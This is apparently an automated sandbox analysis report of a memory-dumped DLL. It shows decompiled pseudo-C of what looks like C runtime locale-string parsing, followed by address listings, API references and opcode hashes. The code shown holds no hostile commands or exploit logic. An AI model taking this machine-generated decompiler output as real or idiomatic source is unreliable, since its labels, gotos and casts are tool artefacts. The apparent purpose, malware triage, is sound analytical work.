							if( *_t485 != 0x4c) {
								L58:
								_push(0);
								_t273 = E6E2117C5(_t388, _t456, _t467, _t485, _t485,  &_v276, 0x83,  &_v448, 0x55); // executed
								_t512 = _t511 + 0x18;
								__eflags = _t273;
								if(_t273 != 0) {
									_t402 = 0;
									__eflags = 0;
									_t76 = _t467 + 0x20; // 0x6e21144e
									_t457 = _t76;
									_t487 = 0;
									_v452 = _t457;
									do {
										__eflags = _t487;
										if(_t487 == 0) {
											L73:
											_t274 = _v456;
										} else {
											_t406 =  *_t457;
											_t275 =  &_v276;
											while(1) {
												__eflags =  *_t275 -  *_t406;
												_t467 = _v464;
												if( *_t275 !=  *_t406) {
													break;
												}
												__eflags =  *_t275;
												if( *_t275 == 0) {
													L66:
													_t402 = 0;
													_t276 = 0;
												} else {
													_t458 =  *((intOrPtr*)(_t275 + 2));
													__eflags = _t458 -  *((intOrPtr*)(_t406 + 2));
													_v458 = _t458;
													_t457 = _v452;
													if(_t458 !=  *((intOrPtr*)(_t406 + 2))) {
														break;
													} else {
														_t275 = _t275 + 4;
														_t406 = _t406 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t276;
												if(_t276 == 0) {
													_t388 = _t388 + 1;
													__eflags = _t388;
													goto L73;
												} else {
													_t277 =  &_v276;
													_push(_t277);
													_push(_t487);
													_push(_t467); // executed
													L83(); // executed
													_t457 = _v452;
													_t512 = _t512 + 0xc;
													__eflags = _t277;
													if(_t277 == 0) {
														_t402 = 0;
														_t274 = 0;
														_v456 = 0;
													} else {
														_t388 = _t388 + 1;
														_t402 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t276 = _t275 | 0x00000001;
											_t402 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t487 = _t487 + 1;
										_t457 = _t457 + 0x10;
										_v452 = _t457;
										__eflags = _t487 - 5;
									} while (_t487 <= 5);
									__eflags = _t274;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t388;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *((short*)(_t485 + 2)) - 0x43;
								if( *((short*)(_t485 + 2)) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t485 + 4)) - 0x5f;
									if( *((short*)(_t485 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t279 = E6E21BC88(_t485, 0x6e23fa68);
											_t390 = _t279;
											_v472 = _t390;
											_pop(_t408);
											__eflags = _t390;
											if(_t390 == 0) {
												break;
											}
											_t281 = _t279 - _t485;
											__eflags = _t281;
											_v456 = _t281 >> 1;
											if(_t281 == 0) {
												break;
											} else {
												_t283 = 0x3b;
												__eflags =  *_t390 - _t283;
												if( *_t390 == _t283) {
													break;
												} else {
													_t470 = _v456;
													_t391 = 0x6e23f92c;
													_v460 = 1;
													do {
														_t284 = E6E20EC13( *_t391, _t485, _t470);
														_t511 = _t511 + 0xc;
														__eflags = _t284;
														if(_t284 != 0) {
															goto L45;
														} else {
															_t409 =  *_t391;
															_t456 = _t409 + 2;
															do {
																_t363 =  *_t409;
																_t409 = _t409 + 2;
																__eflags = _t363 - _v468;
															} while (_t363 != _v468);
															_t408 = _t409 - _t456 >> 1;
															__eflags = _t470 - _t409 - _t456 >> 1;
															if(_t470 != _t409 - _t456 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t391 = _t391 + 0xc;
														__eflags = _t391 - 0x6e23f95c;
													} while (_t391 <= 0x6e23f95c);
													_t393 = _v472 + 2;
													_t285 = E6E21BC38(_t408, _t393, 0x6e23fa70);
													_t467 = _v464;
													_t488 = _t285;
													_pop(_t412);
													__eflags = _t488;
													if(_t488 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t286 = _v452;
															goto L54;
														} else {
															_push(_t488);
															_t288 = E6E21BC2D(_t412,  &_v276, 0x83, _t393);
															_t513 = _t511 + 0x10;
															__eflags = _t288;
															if(_t288 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E208956();
																asm("int3");
																_push(_t505);
																_t506 = _t513;
																_t291 =  *0x6e24b164; // 0x1dc3c76f
																_v556 = _t291 ^ _t506;
																_push(_t393);
																_t394 = _v540;
																_push(_t488);
																_push(_t467);
																_t471 = _v544;
																_v1292 = _t394;
																_v1276 = E6E20FA06(_t394, _t412, _t456) + 0x278;
																_push( &_v1256);
																_t298 = E6E2117C5(_t394, _t456, _t471, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t515 = _t513 - 0x2e4 + 0x18;
																__eflags = _t298;
																if(_t298 != 0) {
																	_t101 = _t394 + 2; // 0x6
																	_t492 = _t101 << 4;
																	__eflags = _t492;
																	_t299 =  &_v280;
																	_v724 = _t492;
																	_t413 =  *((intOrPtr*)(_t492 + _t471));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t299 -  *_t413;
																		_t494 = _v724;
																		if( *_t299 !=  *_t413) {
																			break;
																		}
																		__eflags =  *_t299;
																		if( *_t299 == 0) {
																			L91:
																			_t300 = _v712;
																		} else {
																			_t503 =  *((intOrPtr*)(_t299 + 2));
																			__eflags = _t503 -  *((intOrPtr*)(_t413 + 2));
																			_v718 = _t503;
																			_t494 = _v724;
																			if(_t503 !=  *((intOrPtr*)(_t413 + 2))) {
																				break;
																			} else {
																				_t299 = _t299 + 4;
																				_t413 = _t413 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t300;
																		if(_t300 != 0) {
																			_t414 =  &_v280;
																			_t460 = _t414 + 2;
																			do {
																				_t301 =  *_t414;
																				_t414 = _t414 + 2;
																				__eflags = _t301 - _v712;
																			} while (_t301 != _v712);
																			_v728 = (_t414 - _t460 >> 1) + 1;
																			_t304 = E6E20FBEC(_t414 - _t460 >> 1, 4 + ((_t414 - _t460 >> 1) + 1) * 2);
																			_v740 = _t304;
																			__eflags = _t304;
																			if(_t304 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t494 + _t471));
																				_t125 = _t394 * 4; // 0x8496
																				_v744 =  *((intOrPtr*)(_t471 + _t125 + 0xa0));
																				_t128 = _t471 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t423 =  &_v280;
																				_v720 = _t304 + 4;
																				_t308 = E6E20D69C(_t304 + 4, _v728,  &_v280);
																				_t516 = _t515 + 0xc;
																				__eflags = _t308;
																				if(_t308 != 0) {
																					_t309 = _v736;
																					_push(_t309);
																					_push(_t309);
																					_push(_t309);
																					_push(_t309);
																					_push(_t309);
																					E6E208956();
																					asm("int3");
																					_push(_t506);
																					_t311 =  &_v1400;
																					GetStartupInfoW(_t311);
																					__eflags = _v1350;
																					if(_v1350 != 0) {
																						_t311 = _v56;
																						__eflags = _t311;
																						if(_t311 != 0) {
																							_push(_t394);
																							_push(_t494);
																							_t496 = _t311->cb;
																							_t396 =  &(_t311->lpReserved);
																							_v40 = _t396 + _t496;
																							__eflags = _t496 - 0x2000;
																							if(__eflags >= 0) {
																								_t496 = 0x2000;
																							}
																							_push(_t496);
																							E6E213E39(_t423, _t460, __eflags);
																							_t315 =  *0x6e2e38b0; // 0x40
																							__eflags = _t496 - _t315;
																							if(_t496 > _t315) {
																								_t496 = _t315;
																							}
																							_push(_t471);
																							_t473 = 0;
																							__eflags = _t496;
																							if(_t496 == 0) {
																								L144:
																								return _t315;
																							} else {
																								_t316 = _v40;
																								do {
																									_t425 =  *_t316;
																									__eflags = _t425 - 0xffffffff;
																									if(_t425 == 0xffffffff) {
																										goto L143;
																									}
																									__eflags = _t425 - 0xfffffffe;
																									if(_t425 == 0xfffffffe) {
																										goto L143;
																									}
																									_t461 =  *_t396;
																									__eflags = _t461 & 0x00000001;
																									if((_t461 & 0x00000001) == 0) {
																										goto L143;
																									}
																									__eflags = _t461 & 0x00000008;
																									if((_t461 & 0x00000008) != 0) {
																										L141:
																										_t463 = (_t473 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x6e2e36b0 + (_t473 >> 6) * 4));
																										__eflags = _t463;
																										 *((intOrPtr*)(_t463 + 0x18)) =  *_v40;
																										 *((char*)(_t463 + 0x28)) =  *_t396;
																										L142:
																										_t316 = _v40;
																										goto L143;
																									}
																									_t322 = GetFileType(_t425);
																									__eflags = _t322;
																									if(_t322 == 0) {
																										goto L142;
																									}
																									goto L141;
																									L143:
																									_t473 = _t473 + 1;
																									_t316 = _t316 + 4;
																									_t396 =  &(_t396[0]);
																									_v40 = _t316;
																									__eflags = _t473 - _t496;
																								} while (_t473 != _t496);
																								goto L144;
																							}
																						}
																					}
																					return _t311;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t494 + _t471)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t325 = E6E211534(_t394, _t423, _t471,  &_v708);
																						_t429 = _v712;
																						 *(_t471 + 0xa0 + _t394 * 4) = _t325;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t429 = _v712;
																							 *(_t471 + 0xa0 + _t394 * 4) = _t429;
																						}
																					}
																					__eflags = _t394 - 2;
																					if(_t394 != 2) {
																						__eflags = _t394 - 1;
																						if(_t394 != 1) {
																							__eflags = _t394 - 5;
																							if(_t394 == 5) {
																								 *((intOrPtr*)(_t471 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t471 + 0x10)) = _v716;
																						}
																					} else {
																						_t501 = _v736;
																						_t464 = _t429;
																						_t439 = _t501;
																						 *(_t471 + 8) = _v716;
																						_v720 = _t501;
																						_v728 = _t501[8];
																						_v716 = _t501[9];
																						while(1) {
																							_t154 = _t471 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t439;
																							if( *_t154 ==  *_t439) {
																								break;
																							}
																							_t502 = _v720;
																							_t464 = _t464 + 1;
																							_t357 =  *_t439;
																							 *_t502 = _v728;
																							_v716 = _t439[1];
																							_t439 = _t502 + 8;
																							 *((intOrPtr*)(_t502 + 4)) = _v716;
																							_t394 = _v752;
																							_t501 = _v736;
																							_v728 = _t357;
																							_v720 = _t439;
																							__eflags = _t464 - 5;
																							if(_t464 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t464 - 5;
																							if(__eflags == 0) {
																								_t178 = _t471 + 8; // 0x8b56ff8b
																								_t348 = E6E215C7C(_t394, _t471, _t501, __eflags, _v712, 1, 0x6e23f9e8, 0x7f,  &_v536,  *_t178, 1);
																								_t516 = _t516 + 0x1c;
																								__eflags = _t348;
																								_t349 = _v712;
																								if(_t348 == 0) {
																									_t501[1] = _t349;
																								} else {
																									do {
																										 *(_t506 + _t349 * 2 - 0x20c) =  *(_t506 + _t349 * 2 - 0x20c) & 0x000001ff;
																										_t349 = _t349 + 1;
																										__eflags = _t349 - 0x7f;
																									} while (_t349 < 0x7f);
																									_t352 = E6E205FDD( &_v536,  *0x6e24b2d4, 0xfe);
																									_t516 = _t516 + 0xc;
																									__eflags = _t352;
																									_t501[1] = 0 | _t352 == 0x00000000;
																								}
																								_t193 = _t471 + 8; // 0x8b56ff8b
																								 *_t501 =  *_t193;
																							}
																							 *(_t471 + 0x18) = _t501[1];
																							goto L121;
																						}
																						__eflags = _t464;
																						if(_t464 != 0) {
																							 *_t501 =  *(_t501 + _t464 * 8);
																							_t501[1] =  *(_t501 + 4 + _t464 * 8);
																							 *(_t501 + _t464 * 8) = _v728;
																							 *(_t501 + 4 + _t464 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t326 = _t394 * 0xc;
																					_t200 = _t326 + 0x6e23f928; // 0x6e202dcb
																					 *0x6e2211c4(_t471); // executed
																					_t328 =  *((intOrPtr*)( *_t200))(); // executed
																					_t432 = _v732;
																					__eflags = _t328;
																					if(_t328 == 0) {
																						__eflags = _t432 - 0x6e24b3a0;
																						if(_t432 != 0x6e24b3a0) {
																							_t500 = _t394 + _t394;
																							__eflags = _t500;
																							asm("lock xadd [eax], ecx");
																							if(_t500 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t500 * 8; // 0x30ff068b
																								E6E20FBB2( *((intOrPtr*)(_t471 + _t218 + 0x28)));
																								_t221 = _t500 * 8; // 0x30ff0c46
																								E6E20FBB2( *((intOrPtr*)(_t471 + _t221 + 0x24)));
																								_t224 = _t394 * 4; // 0x8496
																								E6E20FBB2( *((intOrPtr*)(_t471 + _t224 + 0xa0)));
																								_t435 = _v712;
																								 *((intOrPtr*)(_v724 + _t471)) = _t435;
																								 *(_t471 + 0xa0 + _t394 * 4) = _t435;
																							}
																						}
																						_t433 = _v740;
																						 *_t433 = 1;
																						 *((intOrPtr*)(_t471 + 0x28 + (_t394 + _t394) * 8)) = _t433;
																					} else {
																						 *(_v724 + _t471) = _t432;
																						_t205 = _t394 * 4; // 0x8496
																						E6E20FBB2( *((intOrPtr*)(_t471 + _t205 + 0xa0)));
																						 *(_t471 + 0xa0 + _t394 * 4) = _v744;
																						E6E20FBB2(_v740);
																						 *(_t471 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L146;
																	}
																	asm("sbb eax, eax");
																	_t300 = _t299 | 0x00000001;
																	__eflags = _t300;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t506;
																	return E6E203D51(_v16 ^ _t506);
																}
															} else {
																_t359 = _t488 + _t488;
																__eflags = _t359 - 0x106;
																if(_t359 >= 0x106) {
																	E6E20474E();
																	goto L82;
																} else {
																	 *((short*)(_t505 + _t359 - 0x10c)) = 0;
																	_t361 =  &_v276;
																	_push(_t361);
																	_push(_v460);
																	_push(_t467);
																	L83();
																	_t511 = _t513 + 0xc;
																	__eflags = _t361;
																	_t286 = _v452;
																	if(_t361 != 0) {
																		_t286 = _t286 + 1;
																		_v452 = _t286;
																	}
																	L54:
																	_t489 = _t393 + _t488 * 2;
																	_t402 = 0;
																	__eflags =  *_t489;
																	if( *_t489 == 0) {
																		L56:
																		__eflags = _t286;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t485 =  &(_t489[0]);
																		__eflags =  *_t485;
																		if( *_t485 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t362 = 0x3b;
														__eflags =  *_t393 - _t362;
														if( *_t393 != _t362) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L146;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t485;
						if(_t485 != 0) {
							_push(_t485);
							_push(_t267);
							_push(_t467);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t505;
						return E6E203D51(_v12 ^ _t505);
					}
				}
				L146:
			}























































































































































    0x6e211bfd
    0x6e211c0f
    0x6e211c17
    0x6e211c19
    0x6e211c1b
    0x6e211c1e
    0x6e211d37
    0x6e211d3c
    0x6e211c24
    0x6e211c25
    0x6e211c25
    0x6e211c28
    0x6e211c2b
    0x6e211c2d
    0x6e211c30
    0x6e211c30
    0x6e211c33
    0x6e211c35
    0x6e211c38
    0x6e211c3d
    0x6e211c4b
    0x6e211c55
    0x6e211c58
    0x6e211c5b
    0x6e211c5b
    0x6e211c66
    0x6e211c6b
    0x6e211c70
    0x00000000
    0x6e211c76
    0x6e211c79
    0x6e211c79
    0x6e211c7c
    0x6e211c7e
    0x6e211c81
    0x6e211c81
    0x6e211c81
    0x6e211c83
    0x6e211c83
    0x6e211c83
    0x6e211c89
    0x00000000
    0x00000000
    0x6e211c8e
    0x6e211ca5
    0x6e211ca5
    0x6e211c90
    0x6e211c90
    0x6e211c98
    0x00000000
    0x6e211c9a
    0x6e211c9a
    0x6e211c9d
    0x6e211ca3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211ca3
    0x6e211c98
    0x6e211cae
    0x6e211cb3
    0x6e211cb5
    0x6e211cba
    0x6e211cbd
    0x6e211cc0
    0x6e211cc3
    0x6e211cc6
    0x6e211cc8
    0x6e211ccd
    0x6e211cd7
    0x6e211cdf
    0x6e211ce7
    0x00000000
    0x6e211ced
    0x6e211cf1
    0x6e211d3e
    0x6e211d44
    0x6e211d47
    0x6e211d4a
    0x6e211d4c
    0x6e211d50
    0x6e211d54
    0x6e211d56
    0x6e211d59
    0x6e211d5e
    0x6e211d54
    0x6e211d5f
    0x6e211d62
    0x6e211d64
    0x6e211d66
    0x6e211d6a
    0x6e211d6b
    0x6e211d6d
    0x6e211d70
    0x6e211d75
    0x6e211d6b
    0x6e211d78
    0x6e211d7b
    0x6e211d7e
    0x6e211d81
    0x6e211d84
    0x6e211d84
    0x6e211cf3
    0x6e211cf3
    0x6e211cf6
    0x6e211cf9
    0x6e211cfb
    0x6e211cff
    0x6e211d03
    0x6e211d05
    0x6e211d08
    0x6e211d0d
    0x6e211d03
    0x6e211d0e
    0x6e211d13
    0x6e211d15
    0x6e211d1a
    0x6e211d1c
    0x6e211d1f
    0x6e211d24
    0x6e211d1a
    0x6e211d25
    0x6e211d29
    0x6e211d29
    0x6e211d2c
    0x6e211d30
    0x6e211d33
    0x6e211d33
    0x00000000
    0x6e211d36
    0x00000000
    0x6e211ce7
    0x6e211ca9
    0x6e211cab
    0x6e211cab
    0x00000000
    0x6e211cab
    0x6e211d8b
    0x6e211d8c
    0x6e211d8d
    0x6e211d8e
    0x6e211d8f
    0x6e211d90
    0x6e211d95
    0x6e211d99
    0x6e211d9b
    0x6e211da1
    0x6e211da8
    0x6e211dab
    0x6e211dae
    0x6e211daf
    0x6e211db0
    0x6e211db3
    0x6e211db4
    0x6e211db7
    0x6e211dbd
    0x6e211dbf
    0x6e211de4
    0x6e211dee
    0x6e211df4
    0x6e211df6
    0x6e211dfc
    0x6e211dfe
    0x6e212051
    0x6e212052
    0x00000000
    0x6e211e04
    0x6e211e04
    0x6e211e08
    0x6e211f6f
    0x6e211f6f
    0x6e211f86
    0x6e211f8b
    0x6e211f8e
    0x6e211f90
    0x6e211f96
    0x6e211f96
    0x6e211f98
    0x6e211f98
    0x6e211f9b
    0x6e211f9d
    0x6e211fa3
    0x6e211fa3
    0x6e211fa5
    0x6e21202c
    0x6e21202c
    0x6e211fab
    0x6e211fab
    0x6e211fad
    0x6e211fb3
    0x6e211fb6
    0x6e211fb9
    0x6e211fbf
    0x00000000
    0x00000000
    0x6e211fc1
    0x6e211fc5
    0x6e211fee
    0x6e211fee
    0x6e211ff0
    0x6e211fc7
    0x6e211fc7
    0x6e211fcb
    0x6e211fcf
    0x6e211fd6
    0x6e211fdc
    0x00000000
    0x6e211fde
    0x6e211fde
    0x6e211fe1
    0x6e211fe4
    0x6e211fec
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211fec
    0x6e211fdc
    0x6e211ffb
    0x6e211ffb
    0x6e211ffd
    0x6e21202b
    0x6e21202b
    0x00000000
    0x6e211fff
    0x6e211fff
    0x6e212005
    0x6e212006
    0x6e212007
    0x6e212008
    0x6e21200d
    0x6e212013
    0x6e212016
    0x6e212018
    0x6e21201f
    0x6e212021
    0x6e212023
    0x6e21201a
    0x6e21201a
    0x6e21201b
    0x00000000
    0x6e21201b
    0x6e212018
    0x00000000
    0x6e211ffd
    0x6e211ff4
    0x6e211ff6
    0x6e211ff9
    0x6e211ff9
    0x00000000
    0x6e211ff9
    0x6e212032
    0x6e212032
    0x6e212033
    0x6e212036
    0x6e21203c
    0x6e21203c
    0x6e212045
    0x6e212047
    0x00000000
    0x6e212049
    0x6e212049
    0x00000000
    0x6e212049
    0x6e212047
    0x00000000
    0x6e211e0e
    0x6e211e0e
    0x6e211e13
    0x00000000
    0x6e211e19
    0x6e211e19
    0x6e211e1e
    0x00000000
    0x6e211e24
    0x6e211e24
    0x6e211e2a
    0x6e211e2f
    0x6e211e31
    0x6e211e38
    0x6e211e39
    0x6e211e3b
    0x00000000
    0x00000000
    0x6e211e41
    0x6e211e41
    0x6e211e45
    0x6e211e4b
    0x00000000
    0x6e211e51
    0x6e211e53
    0x6e211e54
    0x6e211e57
    0x00000000
    0x6e211e5d
    0x6e211e5d
    0x6e211e63
    0x6e211e68
    0x6e211e72
    0x6e211e76
    0x6e211e7b
    0x6e211e7e
    0x6e211e80
    0x00000000
    0x6e211e82
    0x6e211e82
    0x6e211e84
    0x6e211e87
    0x6e211e87
    0x6e211e8a
    0x6e211e8d
    0x6e211e8d
    0x6e211e98
    0x6e211e9a
    0x6e211e9c
    0x00000000
    0x00000000
    0x6e211e9c
    0x00000000
    0x6e211e9e
    0x6e211e9e
    0x6e211ea4
    0x6e211ea7
    0x6e211ea7
    0x6e211eb5
    0x6e211ebe
    0x6e211ec3
    0x6e211ec9
    0x6e211ecc
    0x6e211ecd
    0x6e211ecf
    0x6e211edd
    0x6e211edd
    0x6e211ee4
    0x6e211f45
    0x00000000
    0x6e211ee6
    0x6e211ee6
    0x6e211ef4
    0x6e211ef9
    0x6e211efc
    0x6e211efe
    0x6e21206e
    0x6e212070
    0x6e212071
    0x6e212072
    0x6e212073
    0x6e212074
    0x6e212075
    0x6e21207a
    0x6e21207d
    0x6e21207e
    0x6e212086
    0x6e21208d
    0x6e212090
    0x6e212091
    0x6e212094
    0x6e212098
    0x6e212099
    0x6e21209c
    0x6e2120ac
    0x6e2120b8
    0x6e2120cf
    0x6e2120d4
    0x6e2120d7
    0x6e2120d9
    0x6e2120ee
    0x6e2120f1
    0x6e2120f1
    0x6e2120f4
    0x6e2120fa
    0x6e212103
    0x6e212105
    0x6e212108
    0x6e21210f
    0x6e212112
    0x6e212118
    0x00000000
    0x00000000
    0x6e21211a
    0x6e21211e
    0x6e212147
    0x6e212147
    0x6e212120
    0x6e212120
    0x6e212124
    0x6e212128
    0x6e21212f
    0x6e212135
    0x00000000
    0x6e212137
    0x6e212137
    0x6e21213a
    0x6e21213d
    0x6e212145
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e212145
    0x6e212135
    0x6e212154
    0x6e212154
    0x6e212156
    0x6e21215c
    0x6e212162
    0x6e212165
    0x6e212165
    0x6e212168
    0x6e21216b
    0x6e21216b
    0x6e21217b
    0x6e212189
    0x6e21218e
    0x6e212195
    0x6e212197
    0x00000000
    0x6e21219d
    0x6e2121a3
    0x6e2121a9
    0x6e2121b0
    0x6e2121b6
    0x6e2121b9
    0x6e2121bf
    0x6e2121cc
    0x6e2121d3
    0x6e2121d8
    0x6e2121db
    0x6e2121dd
    0x6e212436
    0x6e21243c
    0x6e21243d
    0x6e21243e
    0x6e21243f
    0x6e212440
    0x6e212441
    0x6e212446
    0x6e212449
    0x6e21244f
    0x6e212453
    0x6e212459
    0x6e21245e
    0x6e212464
    0x6e212467
    0x6e212469
    0x6e21246f
    0x6e212470
    0x6e212471
    0x6e212473
    0x6e212479
    0x6e212481
    0x6e212483
    0x6e212485
    0x6e212485
    0x6e212487
    0x6e212488
    0x6e21248d
    0x6e212493
    0x6e212495
    0x6e212497
    0x6e212497
    0x6e212499
    0x6e21249a
    0x6e21249c
    0x6e21249e
    0x6e2124f6
    0x00000000
    0x6e2124a0
    0x6e2124a0
    0x6e2124a3
    0x6e2124a3
    0x6e2124a5
    0x6e2124a8
    0x00000000
    0x00000000
    0x6e2124aa
    0x6e2124ad
    0x00000000
    0x00000000
    0x6e2124af
    0x6e2124b1
    0x6e2124b4
    0x00000000
    0x00000000
    0x6e2124b6
    0x6e2124b9
    0x6e2124c6
    0x6e2124d6
    0x6e2124d6
    0x6e2124df
    0x6e2124e4
    0x6e2124e7
    0x6e2124e7
    0x00000000
    0x6e2124e7
    0x6e2124bc
    0x6e2124c2
    0x6e2124c4
    0x00000000
    0x00000000
    0x00000000
    0x6e2124ea
    0x6e2124ea
    0x6e2124eb
    0x6e2124ee
    0x6e2124ef
    0x6e2124f2
    0x6e2124f2
    0x00000000
    0x6e2124a3
    0x6e21249e
    0x6e212469
    0x6e2124fc
    0x6e2121e3
    0x6e2121e3
    0x6e2121f1
    0x6e2121f4
    0x6e21220f
    0x6e212216
    0x6e21221c
    0x6e212222
    0x6e2121f6
    0x6e2121f6
    0x6e2121fe
    0x00000000
    0x6e212200
    0x6e212200
    0x6e212206
    0x6e212206
    0x6e2121fe
    0x6e212229
    0x6e21222c
    0x6e212349
    0x6e21234c
    0x6e212359
    0x6e21235c
    0x6e212364
    0x6e212364
    0x6e21234e
    0x6e212354
    0x6e212354
    0x6e212232
    0x6e212232
    0x6e212238
    0x6e212240
    0x6e212242
    0x6e212245
    0x6e21224e
    0x6e212257
    0x6e21225d
    0x6e21225d
    0x6e212260
    0x6e212262
    0x00000000
    0x00000000
    0x6e212264
    0x6e21226a
    0x6e21226b
    0x6e212276
    0x6e21227e
    0x6e212286
    0x6e212289
    0x6e21228c
    0x6e212292
    0x6e212298
    0x6e21229e
    0x6e2122a4
    0x6e2122a7
    0x00000000
    0x00000000
    0x6e2122a9
    0x6e2122ce
    0x6e2122ce
    0x6e2122d1
    0x6e2122d5
    0x6e2122ee
    0x6e2122f3
    0x6e2122f6
    0x6e2122f8
    0x6e2122fe
    0x6e212339
    0x6e212300
    0x6e212300
    0x6e212305
    0x6e21230d
    0x6e21230e
    0x6e21230e
    0x6e212325
    0x6e21232c
    0x6e21232f
    0x6e212334
    0x6e212334
    0x6e21233c
    0x6e21233f
    0x6e21233f
    0x6e212344
    0x00000000
    0x6e212344
    0x6e2122ab
    0x6e2122ad
    0x6e2122b2
    0x6e2122b8
    0x6e2122c1
    0x6e2122ca
    0x6e2122ca
    0x00000000
    0x6e2122ad
    0x6e212367
    0x6e212367
    0x6e21236b
    0x6e212373
    0x6e212379
    0x6e21237c
    0x6e212382
    0x6e212384
    0x6e2123c4
    0x6e2123ca
    0x6e2123d1
    0x6e2123d1
    0x6e2123d7
    0x6e2123db
    0x00000000
    0x6e2123dd
    0x6e2123dd
    0x6e2123e1
    0x6e2123e6
    0x6e2123ea
    0x6e2123ef
    0x6e2123f6
    0x6e212404
    0x6e21240a
    0x6e21240d
    0x6e21240d
    0x6e2123db
    0x6e21241c
    0x6e212424
    0x6e21242d
    0x6e212386
    0x6e21238c
    0x6e21238f
    0x6e212396
    0x6e2123a8
    0x6e2123af
    0x6e2123bc
    0x00000000
    0x6e2123bc
    0x00000000
    0x6e212384
    0x6e2121dd
    0x6e212158
    0x00000000
    0x6e212158
    0x00000000
    0x6e212156
    0x6e21214f
    0x6e212151
    0x6e212151
    0x00000000
    0x6e2120db
    0x6e2120db
    0x6e2120db
    0x6e2120dd
    0x6e2120e2
    0x6e2120ed
    0x6e2120ed
    0x6e211f04
    0x6e211f04
    0x6e211f07
    0x6e211f0c
    0x6e212069
    0x00000000
    0x6e211f12
    0x6e211f14
    0x6e211f1c
    0x6e211f22
    0x6e211f23
    0x6e211f29
    0x6e211f2a
    0x6e211f2f
    0x6e211f32
    0x6e211f34
    0x6e211f3a
    0x6e211f3c
    0x6e211f3d
    0x6e211f3d
    0x6e211f4b
    0x6e211f4b
    0x6e211f4e
    0x6e211f50
    0x6e211f53
    0x6e211f61
    0x6e211f61
    0x6e21204b
    0x6e21204b
    0x00000000
    0x6e21204d
    0x6e21204d
    0x00000000
    0x6e211f55
    0x6e211f55
    0x6e211f58
    0x6e211f5b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211f5b
    0x6e211f53
    0x6e211f0c
    0x6e211efe
    0x6e211ed1
    0x6e211ed3
    0x6e211ed4
    0x6e211ed7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211ed7
    0x6e211ecf
    0x6e211e57
    0x00000000
    0x6e211e4b
    0x00000000
    0x6e211f68
    0x6e211e1e
    0x6e211e13
    0x6e211e08
    0x6e211dc1
    0x6e211dc1
    0x6e211dc3
    0x6e211dc5
    0x6e211dc6
    0x6e211dc7
    0x6e211dc8
    0x6e211dcd
    0x6e212058
    0x6e21205d
    0x6e212068
    0x6e212068
    0x6e211dbf
    0x00000000

    APIs
      • Part of subcall function 6E20FBEC: HeapAlloc.KERNEL32(00000000,0000060B,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FC1E
    • _free.LIBCMT ref: 6E211D08
    • _free.LIBCMT ref: 6E211D1F
    • _free.LIBCMT ref: 6E211D3E
    • _free.LIBCMT ref: 6E211D59
    • _free.LIBCMT ref: 6E211D70
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$AllocHeap
    • String ID:
    • API String ID: 1835388192-0
    • Opcode ID: bc7cf207223f1f882eb4dd2d1379cd531759de7da03991c4bbe6a48a28263ca8
    • Instruction ID: ce4ccf4aab1e7d5b2b0e68d6fba0038fa5ea11525579f9a4f3d2b246d50379fd
    • Opcode Fuzzy Hash: bc7cf207223f1f882eb4dd2d1379cd531759de7da03991c4bbe6a48a28263ca8
